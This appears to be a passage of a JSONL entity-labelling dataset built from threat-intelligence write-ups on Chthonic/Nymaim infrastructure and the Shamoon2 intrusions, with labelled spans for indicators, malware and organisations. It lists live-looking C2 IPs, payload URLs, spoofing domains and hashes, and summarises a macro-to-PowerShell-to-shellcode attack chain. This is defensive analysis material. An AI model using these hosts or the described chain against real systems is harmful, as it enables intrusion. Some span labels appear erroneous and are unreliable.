. dd9c558ba58ac81a2142ecb308ac8d0f044c7059a039d2e367024d953cd14a00 2017-07-27 02 . cb3173a820ac392005de650bbd1dd24543a91e72d4d56300a7795e887a8323b2 2017-07-31 14 C:\\letterbxing\\EVP\\Chices\\legit.pdb . a636f49814ea6603534f780b83a5d0388f5a5d0eb848901e1e1bf2d19dd84f05 2017-07-31 18 C:\\Biomuse\\moment\\705\\cnvincing.pdb . 677dd11912a0f13311d025f88caabeeeb1bda27c7c1b5c78cffca36de46e8560 2017-07-31 21 . fdedf0f90d42d3779b07951d1e8826c7015b3f3e724ab89e350c9608e1f23852 2017-08-01 21 . 142bf7f47bfbd592583fbcfa22a25462df13da46451b17bb984d50ade68a5b17 2017-08-02 09 . 6f4b2c95b1a0f320da1b1eaa918c338c0bab5cddabe169f12ee734243ed8bba8 2017-08-02 12 C:\\cataloging\\Dr\\VarianceShadows11.pdb . fd5fd7058cf157ea249d4dcba71331f0041b7cf8fd635f37ad13aed1b06bebf2 2017-08-04 02 C:\\dumplings\\That\\BIT\\Warez\\loc.pdb . 5785c2d68d6f669b96c3f31065f0d9804d2ab1f333a90d225bd993e66656b7d9 2017-08-07 12 C:\\Lgisys\\hypothesized\\donatedc.pdb . 675719a9366386034c285e99bf33a1a8bafc7644874b758f307d9a288e95bdbd 2017-08-07 17 C:\\work\\cr\\nata\\cpp\\seven\\seven\\release\\seven.pdb .", "spans": [{"start": 152, "end": 216, "label": "Indicator"}, {"start": 233, "end": 297, "label": "Indicator"}, {"start": 356, "end": 420, "label": "Indicator"}, {"start": 479, "end": 543, "label": "Indicator"}, {"start": 560, "end": 624, "label": "Indicator"}, {"start": 641, "end": 705, "label": "Indicator"}, {"start": 761, "end": 825, "label": "Indicator"}, {"start": 881, "end": 945, "label": "Indicator"}, {"start": 1001, "end": 1065, "label": "Indicator"}, {"start": 1121, "end": 1185, "label": "Indicator"}, {"start": 1202, "end": 1266, "label": "Indicator"}, {"start": 1282, "end": 1346, "label": "Indicator"}, {"start": 1363, "end": 1427, "label": "Indicator"}, {"start": 1444, "end": 1508, "label": "Indicator"}, {"start": 1525, "end": 1589, "label": "Indicator"}, {"start": 1645, "end": 1709, "label": "Indicator"}, {"start": 1726, "end": 1790, "label": "Indicator"}, {"start": 1843, "end": 1907, "label": "Indicator"}, {"start": 1924, "end": 1988, "label": "Indicator"}, {"start": 2041, "end": 2105, "label": "Indicator"}, {"start": 2161, "end": 2225, "label": "Indicator"}, {"start": 2242, "end": 2306, "label": "Indicator"}, {"start": 2359, "end": 2423, "label": "Indicator"}, {"start": 2440, "end": 2504, "label": "Indicator"}, {"start": 2557, "end": 2621, "label": "Indicator"}, {"start": 2674, "end": 2738, "label": "Indicator"}, {"start": 2755, "end": 2819, "label": "Indicator"}, {"start": 2836, "end": 2900, "label": "Indicator"}, {"start": 2917, "end": 2981, "label": "Indicator"}, {"start": 3037, "end": 3101, "label": "Indicator"}, {"start": 3154, "end": 3218, "label": "Indicator"}, {"start": 3271, "end": 3335, "label": "Indicator"}]}
{"text": "At least one of the binaries compiled in August had a PDB string I was able to locate online in a collection of other PDB files , so they may be introducing their malicious code into these files before compiling someone else \u2019s project .", "spans": []}
{"text": "Once the file has been downloaded and executed , the new process will launch a legitimate executable , such as \u201c msiexec.exe \u201d , and inject code into it .", "spans": [{"start": 113, "end": 124, "label": "Indicator"}]}
{"text": "This code will then download further payloads through a POST request to various websites .", "spans": [{"start": 56, "end": 60, "label": "Indicator"}]}
{"text": "This pattern is shared across the original samples .", "spans": []}
{"text": "These HTTP requests match known patterns for a banking Trojan named Chthonic , which is a variant of Zeus .", "spans": [{"start": 6, "end": 10, "label": "Indicator"}, {"start": 47, "end": 61, "label": "Malware"}, {"start": 68, "end": 76, "label": "Malware"}]}
{"text": "A good write-up from 2014 on the malware can be found in this writeup from Yury Namestnikov , Vladimir Kuskov , Oleg Kupreev at Kaspersky Lab here and indicates that the returned data is an RC4 encrypted loader that sets-up the main Chthonic module which can download additional modules or malware .", "spans": [{"start": 233, "end": 241, "label": "Malware"}]}
{"text": "Iterating once again over the 171 samples and scraping out the HTTP POST requests , I ended up with the below set of domains :", "spans": [{"start": 63, "end": 67, "label": "Indicator"}, {"start": 68, "end": 72, "label": "Indicator"}]}
{"text": "amellet.bit danrnysvp.com ejtmjealr.com firop.com gefinsioje.com gesofgamd.com ponedobla.bit unoset.com .", "spans": [{"start": 0, "end": 11, "label": "Indicator"}, {"start": 12, "end": 25, "label": "Indicator"}, {"start": 26, "end": 39, "label": "Indicator"}, {"start": 40, "end": 49, "label": "Indicator"}, {"start": 50, "end": 64, "label": "Indicator"}, {"start": 65, "end": 78, "label": "Indicator"}, {"start": 79, "end": 92, "label": "Indicator"}, {"start": 93, "end": 103, "label": "Indicator"}]}
{"text": "Using this as the next pivot , we have 6,034 unique samples that get returned in AutoFocus having made POST requests to these sites .", "spans": [{"start": 103, "end": 107, "label": "Indicator"}]}
{"text": "Additionally , we can see there were at least 3 very large campaigns where Palo Alto Networks saw activity to these sites in July .", "spans": []}
{"text": "From these distribution sites , we can see that 5,520 samples are making HTTP requests to them and these samples have been identified as another downloader Trojan named Nymaim .", "spans": [{"start": 73, "end": 77, "label": "Indicator"}, {"start": 156, "end": 162, "label": "Malware"}, {"start": 169, "end": 175, "label": "Malware"}]}
{"text": "The majority of the overall samples came from the following four sites :", "spans": []}
{"text": "ejtmjealr.com gefinsioje.com gesofgamd.com ponedobla.bit .", "spans": [{"start": 0, "end": 13, "label": "Indicator"}, {"start": 14, "end": 28, "label": "Indicator"}, {"start": 29, "end": 42, "label": "Indicator"}, {"start": 43, "end": 56, "label": "Indicator"}]}
{"text": "The \u2018 ejtmjealr.com \u2019 domain is particularly interesting due to a similar domain , \u2018 ejdqzkd.com \u2019 being discussed by Jaros\u0142aw Jedynak of CERT.PL in this analysis of Nymaim from earlier in the year .", "spans": [{"start": 6, "end": 19, "label": "Indicator"}, {"start": 85, "end": 96, "label": "Indicator"}, {"start": 138, "end": 145, "label": "Organization"}, {"start": 166, "end": 172, "label": "Malware"}]}
{"text": "They go on to discuss how Nymaim uses a static configuration to contact that domain , which will return IP \u2019s that go into a DGA and output the actual IP addresses needed for C2 communication .", "spans": [{"start": 26, "end": 32, "label": "Malware"}, {"start": 175, "end": 177, "label": "System"}]}
{"text": "Ben Baker , Edmund Brumaghin and Jonah Samost of Talos have a fantastic write-up of this process here .", "spans": [{"start": 49, "end": 54, "label": "Organization"}]}
{"text": "To continue my analysis , I shifted focus to Maltego so as to visually graph the infrastructure .", "spans": [{"start": 45, "end": 52, "label": "System"}]}
{"text": "For this task , I used PassiveTotal \u2019s Passive DNS and AutoFocus Maltego transforms .", "spans": [{"start": 23, "end": 50, "label": "System"}, {"start": 55, "end": 83, "label": "System"}]}
{"text": "Pivoting off the five highlighted IP \u2019s above with a shared infrastructure , I pulled the reverse DNS to see what other sites may be present .", "spans": [{"start": 98, "end": 101, "label": "Indicator"}]}
{"text": "The \u201c idXXXXX.top \u201d pattern immediately stands out and may suggest a pattern in the static configuration for the initial domains used by the DGA for Nymaim since the previous two started with \u201c ejX.com .", "spans": [{"start": 149, "end": 155, "label": "Malware"}, {"start": 194, "end": 201, "label": "Indicator"}]}
{"text": "Given the level of overlap already , I proceeded to grab all of the passive DNS available for each of the 707 IP addresses .", "spans": [{"start": 76, "end": 79, "label": "Indicator"}]}
{"text": "A full list of the domains can be seen here .", "spans": []}
{"text": "From the first cluster on the left , if we sort by incoming links per node a pattern stands out in the domain names looking similar to the previously mentioned Nymaim ones .", "spans": [{"start": 160, "end": 166, "label": "Malware"}]}
{"text": "A quick search with the AutoFocus transform to pull tag information shows these are specifically related to Nymaim , most likely for the DGA seed ; however , looking at domains with less links , other malware families begin to emerge .", "spans": [{"start": 108, "end": 114, "label": "Malware"}, {"start": 195, "end": 217, "label": "Malware"}]}
{"text": "The cluster on the right is actually collapsing one collection of entities due to the sheer size of it .", "spans": []}
{"text": "All of these connected domains follow a pattern similar to phishing attacks masquerading as legitimate services \u2013 in this case \u201c online.verify.paypal \u201d ( 588 ) and \u201c hmrc.secure.refund \u201d ( 1021 ) .", "spans": []}
{"text": "In addition to domains of that type , there is evidence of other malware distribution being carried out on this infrastructure .", "spans": []}
{"text": "Collapsing the collection back down , note the two domains \u201c brontorittoozzo.com \u201d and \u201c randomessstioprottoy.net \u201d that fall outside of the collection due to more infrastructure connections .", "spans": [{"start": 61, "end": 80, "label": "Indicator"}, {"start": 89, "end": 113, "label": "Indicator"}]}
{"text": "By pivoting off of one sample we were able to zoom out and identify a sizable infrastructure of what appears to be 707 IP \u2019s and 2,611 domains being utilized for malicious activity .", "spans": []}
{"text": "As such , these findings represent a collection of compromised websites , compromised registrar accounts used to spin up subdomains , domains used by malware DGA \u2019s , phishing kits , carding forums , malware C2 sites , and a slew of other domains that revolve around criminal activity .", "spans": [{"start": 158, "end": 161, "label": "Malware"}, {"start": 208, "end": 210, "label": "System"}]}
{"text": "Hopefully this analysis has been helpful in understanding how truly connected some of these infrastructures can be and how with a little digging , you can uncover a substantial amount of operationally useful indicators to protect you and yours .", "spans": []}
{"text": "The Full Shamoon : How the Devastating Malware Was Inserted Into Networks", "spans": [{"start": 9, "end": 16, "label": "Malware"}]}
{"text": ".", "spans": []}
{"text": "Researchers from the IBM X-Force Incident Response and Intelligence Services ( IRIS ) team identified a missing link in the operations of a threat actor involved in recent Shamoon malware attacks against Gulf state organizations .", "spans": [{"start": 21, "end": 90, "label": "Organization"}]}
{"text": "These attacks , which occurred in November 2016 and January 2017 , reportedly affected thousands of computers across multiple government and civil organizations in Saudi Arabia and elsewhere in Gulf states .", "spans": []}
{"text": "Shamoon is designed to destroy computer hard drives by wiping the master boot record ( MBR ) and data irretrievably , unlike ransomware , which holds the data hostage for a fee .", "spans": [{"start": 0, "end": 7, "label": "Malware"}]}
{"text": "Through their recent investigations , our forensics analysts pinpointed the initial compromise vector and post-compromise operations that led to the deployment of the destructive Shamoon malware on targeted infrastructures .", "spans": [{"start": 179, "end": 186, "label": "Malware"}]}
{"text": "It \u2019s worth mentioning that , according to X-Force IRIS , the initial compromise took place weeks before the actual Shamoon deployment and activation were launched .", "spans": [{"start": 43, "end": 55, "label": "Organization"}, {"start": 116, "end": 123, "label": "Malware"}]}
{"text": "Since Shamoon incidents feature the infiltration and escalation stages of targeted attacks , X-Force IRIS responders sought out the attackers \u2019 entry point .", "spans": [{"start": 93, "end": 116, "label": "System"}]}
{"text": "Their findings pointed to what appears to be the initial point of compromise the attackers used : a document containing a malicious macro that , when approved to execute , enabled C2 communications to the attacker \u2019s server and remote shell via PowerShell .", "spans": [{"start": 180, "end": 182, "label": "Indicator"}, {"start": 245, "end": 255, "label": "System"}]}
{"text": "The document was not the only one discovered in the recent attack waves .", "spans": []}
{"text": "X-Force IRIS researchers had been tracking earlier activity associated with similar malicious , PowerShell-laden documents themed as resumes and human resources documents , some of which related to organizations in Saudi Arabia .", "spans": [{"start": 0, "end": 12, "label": "Organization"}]}
{"text": "This research identified several bouts of offensive activity that occurred in the past few months , which revealed similar operational methods in which the attackers served malicious documents and other malware executables from web servers to their targets to establish an initial foothold in the network .", "spans": []}
{"text": "Although Shamoon was previously documented in research blogs , the specific network compromise methods leading to the attacks have remained unclear in the reported cases .", "spans": [{"start": 9, "end": 16, "label": "Malware"}]}
{"text": "X-Force IRIS researchers studied Shamoon \u2019s attack life cycle and observed its tactics at Saudi-based organizations and private sector companies .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 33, "end": 40, "label": "Malware"}]}
{"text": "This research led them to believe that the actor using Shamoon in recent attacks relied heavily on weaponized documents built to leverage PowerShell to establish their initial network foothold and subsequent operations :", "spans": [{"start": 55, "end": 62, "label": "Malware"}, {"start": 138, "end": 148, "label": "System"}]}
{"text": "Attackers send a spear phishing email to employees at the target organization .", "spans": [{"start": 32, "end": 37, "label": "System"}]}
{"text": "The email contains a Microsoft Office document as an attachment .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 21, "end": 37, "label": "System"}]}
{"text": "Opening the attachment from the email invokes PowerShell and enables command line access to the compromised machine .", "spans": [{"start": 32, "end": 37, "label": "System"}, {"start": 46, "end": 56, "label": "System"}]}
{"text": "Attackers can now communicate with the compromised machine and remotely execute commands on it .", "spans": []}
{"text": "The attackers use their access to deploy additional tools and malware to other endpoints or escalate privileges in the network .", "spans": []}
{"text": "Attackers study the network by connecting to additional systems and locating critical servers .", "spans": []}
{"text": "The attackers deploy the Shamoon malware .", "spans": [{"start": 25, "end": 32, "label": "Malware"}]}
{"text": "A coordinated Shamoon outbreak begins and computer hard drives across the organization are permanently wiped .", "spans": [{"start": 14, "end": 21, "label": "Malware"}]}
{"text": "X-Force IRIS identified the below malicious document .", "spans": [{"start": 0, "end": 12, "label": "Organization"}]}
{"text": "X-Force IRIS File name : cv_itworx.doc .", "spans": [{"start": 25, "end": 38, "label": "Indicator"}]}
{"text": "X-Force IRIS MD5 : 45b0e5a457222455384713905f886bd4 .", "spans": [{"start": 19, "end": 51, "label": "Indicator"}]}
{"text": "X-Force IRIS SHA256 : 528714aaaa4a083e72599c32c18aa146db503eee80da236b20aea11aa43bdf62 .", "spans": [{"start": 22, "end": 86, "label": "Indicator"}]}
{"text": "X-Force IRIS Hosting URL : http://mol.com-ho.me/cv_itworx.doc .", "spans": [{"start": 27, "end": 61, "label": "Indicator"}]}
{"text": "Our researchers examined the domain that hosted the first malicious file , mol.com-ho.me .", "spans": [{"start": 75, "end": 88, "label": "Indicator"}]}
{"text": "Per the domain \u2019s WHOIS record , an anonymized registrant registered com-ho.me in October 2016 and used it to serve malicious documents with similar macro activation features .", "spans": [{"start": 18, "end": 23, "label": "Indicator"}, {"start": 69, "end": 78, "label": "Indicator"}]}
{"text": "The following list of documents included :", "spans": []}
{"text": "cv.doc : f4d18316e367a80e1005f38445421b1f . cv_itworx.doc : 45b0e5a457222455384713905f886bd4 . cv_mci.doc : f4d18316e367a80e1005f38445421b1f . discount_voucher_codes.xlsm : 19cea065aa033f5bcfa94a583ae59c08 .", "spans": [{"start": 0, "end": 6, "label": "Indicator"}, {"start": 9, "end": 41, "label": "Indicator"}, {"start": 44, "end": 57, "label": "Indicator"}, {"start": 60, "end": 92, "label": "Indicator"}, {"start": 95, "end": 105, "label": "Indicator"}, {"start": 108, "end": 140, "label": "Indicator"}, {"start": 143, "end": 170, "label": "Indicator"}, {"start": 173, "end": 205, "label": "Indicator"}]}
{"text": "Health_insurance_plan.doc : ecfc0275c7a73a9c7775130ebca45b74 .", "spans": [{"start": 0, "end": 25, "label": "Indicator"}, {"start": 28, "end": 60, "label": "Indicator"}]}
{"text": "Health_insurance_registration.doc : 1b5e33e5a244d2d67d7a09c4ccf16e56 . job_titles.doc : fa72c068361c05da65bf2117db76aaa8 . job_titles_itworx.doc : 43fad2d62bc23ffdc6d301571135222c . job_titles_mci.doc : ce25f1597836c28cf415394fb350ae93 .", "spans": [{"start": 0, "end": 33, "label": "Indicator"}, {"start": 36, "end": 68, "label": "Indicator"}, {"start": 71, "end": 85, "label": "Indicator"}, {"start": 88, "end": 120, "label": "Indicator"}, {"start": 123, "end": 144, "label": "Indicator"}, {"start": 147, "end": 179, "label": "Indicator"}, {"start": 182, "end": 200, "label": "Indicator"}, {"start": 203, "end": 235, "label": "Indicator"}]}
{"text": "Password_Policy.xlsm : 03ea9457bf71d51d8109e737158be888 .", "spans": [{"start": 0, "end": 20, "label": "Indicator"}, {"start": 23, "end": 55, "label": "Indicator"}]}
{"text": "These files were most likely delivered via spear phishing emails to lure employees into unwittingly launching the malicious payload .", "spans": [{"start": 58, "end": 64, "label": "System"}]}
{"text": "A closer review of the file names revealed \u201c IT Worx \u201d and \u201c MCI \u201d .", "spans": [{"start": 45, "end": 52, "label": "Organization"}, {"start": 61, "end": 64, "label": "Organization"}]}
{"text": "A search of the name IT Worx brings up a global software professional services organization headquartered in Egypt .", "spans": [{"start": 21, "end": 28, "label": "Organization"}, {"start": 41, "end": 91, "label": "Organization"}]}
{"text": "MCI is Saudi Arabia \u2019s Ministry of Commerce and Investment .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 7, "end": 58, "label": "Organization"}]}
{"text": "It is possible these names were used in spear phishing emails because they would seem benign to Saudi-based employees and lure them to open the attachment .", "spans": [{"start": 55, "end": 61, "label": "System"}]}
{"text": "X-Force IRIS researchers further identified that the threat actor behind the malicious documents served many of them using a URL-shortening scheme in the following pattern : briefl.ink/{a-z0-9}[5] .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 174, "end": 196, "label": "Indicator"}]}
{"text": "File Detail : Info File name : job_titles_itworx.doc .", "spans": [{"start": 31, "end": 52, "label": "Indicator"}]}
{"text": "MD5 : 43fad2d62bc23ffdc6d301571135222c .", "spans": [{"start": 6, "end": 38, "label": "Indicator"}]}
{"text": "SHA256 : e5b643cb6ec30d0d0b458e3f2800609f260a5f15c4ac66faf4ebf384f7976df6 .", "spans": [{"start": 9, "end": 73, "label": "Indicator"}]}
{"text": "Hosting URL : http://briefl.ink/qhtma .", "spans": [{"start": 14, "end": 37, "label": "Indicator"}]}
{"text": "Passive DNS results on a communications domain associated with the Shamoon attack revealed related network infrastructure , identifying additional domains used by the threat actors .", "spans": [{"start": 8, "end": 11, "label": "Indicator"}, {"start": 67, "end": 74, "label": "Malware"}]}
{"text": "Domain Name : Spoofed Site ntg-sa.com The domain ntg-sa.com appears to spoof the legit domain ntg.sa.com associated with the Namer Trading Group .", "spans": [{"start": 27, "end": 37, "label": "Indicator"}, {"start": 49, "end": 59, "label": "Indicator"}, {"start": 94, "end": 104, "label": "Indicator"}, {"start": 125, "end": 144, "label": "Organization"}]}
{"text": "Per their webpage , NTG \u201c was established primarily to cater the growing demands of Petrochemicals waste management within the Kingdom of Saudi Arabia \u201d . maps-modon.club : The maps-modon.club domain appears to spoof maps.modon.gov.sa , which is associated with the Saudi Industrial Property Authority , an organization \u201c responsible for the development of industrial cities with integrated infrastructure and services \u201d .", "spans": [{"start": 155, "end": 170, "label": "Indicator"}, {"start": 177, "end": 192, "label": "Indicator"}, {"start": 217, "end": 234, "label": "Indicator"}, {"start": 266, "end": 301, "label": "Organization"}]}
{"text": "X-Force IRIS discovered that the threat actor was hosting at least one malicious executable on a server hosted on ntg-sa.com .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 114, "end": 124, "label": "Indicator"}]}
{"text": "This file duped targets into believing it was a Flash player installer that would drop a Windows batch to invoke PowerShell into the same C2 communications .", "spans": [{"start": 48, "end": 60, "label": "System"}, {"start": 89, "end": 96, "label": "System"}, {"start": 113, "end": 123, "label": "System"}, {"start": 138, "end": 140, "label": "Indicator"}]}
{"text": "Analysis of one of the threat actor \u2019s documents found that if the macro executes , it launches two separate PowerShell Scripts .", "spans": [{"start": 109, "end": 119, "label": "System"}]}
{"text": "The first one executes a PowerShell script served from http://139.59.46.154:3485/eiloShaegae1 .", "spans": [{"start": 0, "end": 13, "label": "Malware"}, {"start": 25, "end": 35, "label": "System"}, {"start": 55, "end": 93, "label": "Indicator"}]}
{"text": "The host is possibly related to attacks that served the Pupy RAT , a publicly available cross-platform remote access tool .", "spans": [{"start": 56, "end": 64, "label": "System"}]}
{"text": "The second script calls VirtualAlloc to create a buffer , uses memset to load Metasploit-related shellcode into that buffer and executes it through CreateThread .", "spans": [{"start": 0, "end": 17, "label": "Malware"}]}
{"text": "Metasploit is an open source framework popular as a tool for developing and executing exploit code against a remote target machine .", "spans": [{"start": 0, "end": 10, "label": "System"}]}
{"text": "The shellcode performs a DWORD XOR of 4 bytes at an offset from the beginning of the shellcode that changes the code to create a loop so the XOR continues 0x57 times .", "spans": []}
{"text": "If this execution is successful , it creates a buffer using VirtualAlloc and calls InternetReadFile in a loop until all the file contents are retrieved from http://45.76.128.165:4443/0w0O6 .", "spans": [{"start": 157, "end": 188, "label": "Indicator"}]}
{"text": "This is then returned as a string to PowerShell , which calls invoke-expression ( iex ) on it , indicating that the expected payload is PowerShell .", "spans": [{"start": 37, "end": 47, "label": "System"}, {"start": 136, "end": 146, "label": "System"}]}
{"text": "Of note , the macro contained a DownloadFile() function that would use URLDownloadToFileA , but this was never actually used .", "spans": []}
{"text": "Based on observations associated with the malicious document , we observed subsequent shell sessions probably associated with Metasploit B-MAL S-TOOL \u2019s Meterpreter that enabled deployment of additional tools and malware preceding deployment of three Shamoon-related files : ntertmgr32.exe , ntertmgr64.exe and vdsk911.sys .", "spans": [{"start": 275, "end": 289, "label": "Indicator"}, {"start": 292, "end": 306, "label": "Indicator"}, {"start": 311, "end": 322, "label": "Indicator"}]}
{"text": "Although the complete list of Shamoon \u2019s victims is not public , Bloomberg reported that in one case , thousands of computers were destroyed at the headquarters of Saudi \u2019s General Authority of Civil Aviation , erasing critical data and bringing operations to a halt for several days .", "spans": [{"start": 30, "end": 37, "label": "Malware"}, {"start": 164, "end": 208, "label": "Organization"}]}
{"text": "The recent activity X-Force IRIS is seeing from the Shamoon attackers has so far been detected in two waves , but those are likely to subside following the public attention the cases have garnered since late 2016 .", "spans": [{"start": 20, "end": 32, "label": "Organization"}]}
{"text": "Saudi Arabia released a warning to local organizations about the Shamoon malware , alerting about potential attacks and advising organizations to prepare .", "spans": [{"start": 65, "end": 72, "label": "Malware"}]}
{"text": "Additional Insights on Shamoon2 .", "spans": [{"start": 23, "end": 31, "label": "Malware"}]}
{"text": "IBM analysts recently unveiled a first look at how threat actors may have placed Shamoon2 malware on systems in Saudi Arabia .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 81, "end": 89, "label": "Malware"}]}
{"text": "Researchers showcased a potential malware lifecycle which started with spear phishing and eventually led to the deployment of the disk-wiping malware known as Shamoon .", "spans": [{"start": 159, "end": 166, "label": "Malware"}]}
{"text": "Their research showcased a set of downloaders and domains that could potentially lead to a more extensive malware distribution campaign .", "spans": []}
{"text": "While researching elements in the IBM report , ASERT discovered additional malicious domains , IP addresses , and artifacts .", "spans": [{"start": 34, "end": 37, "label": "Organization"}, {"start": 95, "end": 97, "label": "System"}]}
{"text": "The basic functionality of the new documents and their PowerShell components matched what was previously disclosed .", "spans": [{"start": 55, "end": 65, "label": "System"}]}
{"text": "For more information on the overall capabilities of the malware , please review IBM 's ongoing research .", "spans": [{"start": 80, "end": 83, "label": "Organization"}]}
{"text": "It is our hope that by providing additional indicators , end-point investigators and network defenders will be able to discover and mitigate more Shamoon2 related compromises .", "spans": [{"start": 146, "end": 154, "label": "Malware"}]}
{"text": "The following new samples were likely delivered via similar spear phishing campaigns as described in IBM 's research .", "spans": [{"start": 101, "end": 104, "label": "Organization"}]}
{"text": "All three shared the same IPs and URLs , also provided below .", "spans": [{"start": 26, "end": 29, "label": "System"}, {"start": 34, "end": 38, "label": "System"}]}
{"text": "These samples were located by pivoting on document attributes .", "spans": []}
{"text": "In this case , a sample from the IBM report indicated the document author \u2018 gerry.knight \u2019 which led us to the following three additional samples . spear phishing : 2a0df97277ddb361cecf8726df6d78ac 5e5ea1a67c2538dbc01df28e4ea87472 d30b8468d16b631cafe458fd94cc3196 . spear phishing : 104.218.120.128 .", "spans": [{"start": 33, "end": 36, "label": "Organization"}, {"start": 165, "end": 197, "label": "Indicator"}, {"start": 198, "end": 230, "label": "Indicator"}, {"start": 231, "end": 263, "label": "Indicator"}, {"start": 283, "end": 298, "label": "Indicator"}]}
{"text": "spear phishing : 69.87.223.26 .", "spans": [{"start": 17, "end": 29, "label": "Indicator"}]}
{"text": "spear phishing : 5.254.100.200 .", "spans": [{"start": 17, "end": 30, "label": "Indicator"}]}
{"text": "spear phishing : analytics-google.org : 69/checkFile.aspx .", "spans": [{"start": 17, "end": 57, "label": "Indicator"}]}
{"text": "spear phishing : analytics-google.org .", "spans": [{"start": 17, "end": 37, "label": "Indicator"}]}
{"text": "spear phishing : 69.87.223.26:8080/p .", "spans": [{"start": 17, "end": 36, "label": "Indicator"}]}
{"text": "From the previous samples , we performed a passive DNS lookup on the IPs .", "spans": [{"start": 51, "end": 54, "label": "Indicator"}, {"start": 69, "end": 72, "label": "System"}]}
{"text": "We found get.adobe.go-microstf.com hosted at 104.218.120.128 around the time this campaign was ongoing , November 2016 .", "spans": [{"start": 9, "end": 34, "label": "Indicator"}, {"start": 45, "end": 60, "label": "Indicator"}]}
{"text": "Researching the domain go-microstf.com , hosted at 45.63.10.99 , revealed yet another iteration of malicious executables .", "spans": [{"start": 23, "end": 38, "label": "Indicator"}, {"start": 51, "end": 62, "label": "Indicator"}]}
{"text": "In this case , a URL used to download the PowerShell component shared a naming convention found in the IBM report , http://69.87.223.26:8080/eiloShaegae1 and connected to the IP address used by the previous three samples .", "spans": [{"start": 17, "end": 20, "label": "System"}, {"start": 42, "end": 52, "label": "System"}, {"start": 103, "end": 106, "label": "Organization"}, {"start": 116, "end": 153, "label": "Indicator"}]}
{"text": "The following are IOCs related to this domain :", "spans": [{"start": 18, "end": 22, "label": "System"}]}
{"text": "83be35956e5d409306a81e88a1dc89fd . 45.63.10.99 . 69.87.223.26 .", "spans": [{"start": 0, "end": 32, "label": "Indicator"}, {"start": 35, "end": 46, "label": "Indicator"}, {"start": 49, "end": 61, "label": "Indicator"}]}
{"text": "URLs go-microstf.com . 69.87.223.26:8080/eiloShaegae1 . go-microstf.com/checkfile.aspx .", "spans": [{"start": 0, "end": 20, "label": "Indicator"}, {"start": 23, "end": 53, "label": "Indicator"}, {"start": 56, "end": 86, "label": "Indicator"}]}
{"text": "The domain go-microstf.com was originally set up to spoof Google Analytics login page .", "spans": [{"start": 11, "end": 26, "label": "Indicator"}, {"start": 58, "end": 74, "label": "System"}]}
{"text": "Finally , research yielded a relatively unique sample .", "spans": []}
{"text": "This particular iteration was submitted to VirusTotal on September 16 , 2016 .", "spans": [{"start": 43, "end": 53, "label": "System"}]}
{"text": "The majority of samples analyzed to date were submitted no earlier than mid-October , with most being submitted in January 2017 or later .", "spans": []}
{"text": "We were able to discover this particular version by diving further into connections to analytics-google.org .", "spans": [{"start": 87, "end": 107, "label": "Indicator"}]}
{"text": "Unlike newer samples , this one created a unique file sloo.exe .", "spans": [{"start": 54, "end": 62, "label": "Indicator"}]}
{"text": "The file was created at C:\\Documents and Settings\\Admin\\Local Settings\\Temp\\sloo.exe .", "spans": [{"start": 62, "end": 84, "label": "Indicator"}]}
{"text": "In addition to this file , the sample also contacted 104.238.184.252 for the PowerShell executable .", "spans": [{"start": 53, "end": 68, "label": "Indicator"}, {"start": 77, "end": 87, "label": "System"}]}
{"text": "Researchers at Palo Alto have attributed sloo.exe and related activities to threat actors of a likely Iranian state-sponsored origin which they \u2019ve named Magic Hound .", "spans": [{"start": 41, "end": 49, "label": "Indicator"}, {"start": 154, "end": 165, "label": "Organization"}]}
{"text": "The group Magic Hound is linked via infrastructure and tools to the Rocket Kitten threat actor group although Palo Alto cannot confirm the extent of any relationship between the two groups .", "spans": [{"start": 10, "end": 21, "label": "Organization"}, {"start": 68, "end": 81, "label": "Organization"}]}
{"text": "Dell Secureworks analysts recently concluded that domains discussed in the IBM report were linked to the Iranian PuppyRAT .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 75, "end": 78, "label": "Organization"}, {"start": 113, "end": 121, "label": "Organization"}]}
{"text": "In addition , Dell analysts have assessed with high-confidence these activities are attributable to Iranian state-sponsored activities .", "spans": [{"start": 14, "end": 18, "label": "Organization"}]}
{"text": "IOCs for this version were :", "spans": [{"start": 0, "end": 4, "label": "System"}]}
{"text": "Shamoon2 : 07d6406036d6e06dc8019e3ade6ee7de .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 43, "label": "Indicator"}]}
{"text": "Shamoon2 : 104.238.184.252 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 26, "label": "Indicator"}]}
{"text": "Shamoon2 : 5.254.100.200 Shamoon2 : URLs .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 24, "label": "Indicator"}, {"start": 25, "end": 33, "label": "Malware"}, {"start": 36, "end": 40, "label": "System"}]}
{"text": "Shamoon2 : analytics-google.org : 69/checkFile.aspx .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 51, "label": "Indicator"}]}
{"text": "These additional IOCs will hopefully provide more context into the ongoing threat .", "spans": [{"start": 17, "end": 21, "label": "System"}]}
{"text": "The link to possible Iranian threat actors supports ongoing analysis that Shamoon2 was perpetrated by Iranian state-sponsored threat actors .", "spans": [{"start": 74, "end": 82, "label": "Malware"}]}
{"text": "The last sample discussed may be malware-0 or at least part of the overall development and subsequent deployment of tools used to install Shamoon on Saudi systems .", "spans": [{"start": 138, "end": 145, "label": "Malware"}, {"start": 149, "end": 154, "label": "System"}]}
{"text": "Shamoon2 : 2a0df97277ddb361cecf8726df6d78ac .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 43, "label": "Indicator"}]}
{"text": "Shamoon2 : 5e5ea1a67c2538dbc01df28e4ea87472 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 43, "label": "Indicator"}]}
{"text": "Shamoon2 : d30b8468d16b631cafe458fd94cc3196 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 43, "label": "Indicator"}]}
{"text": "Shamoon2 : 83be35956e5d409306a81e88a1dc89fd .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 43, "label": "Indicator"}]}
{"text": "Shamoon2 : 07d6406036d6e06dc8019e3ade6ee7de .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 43, "label": "Indicator"}]}
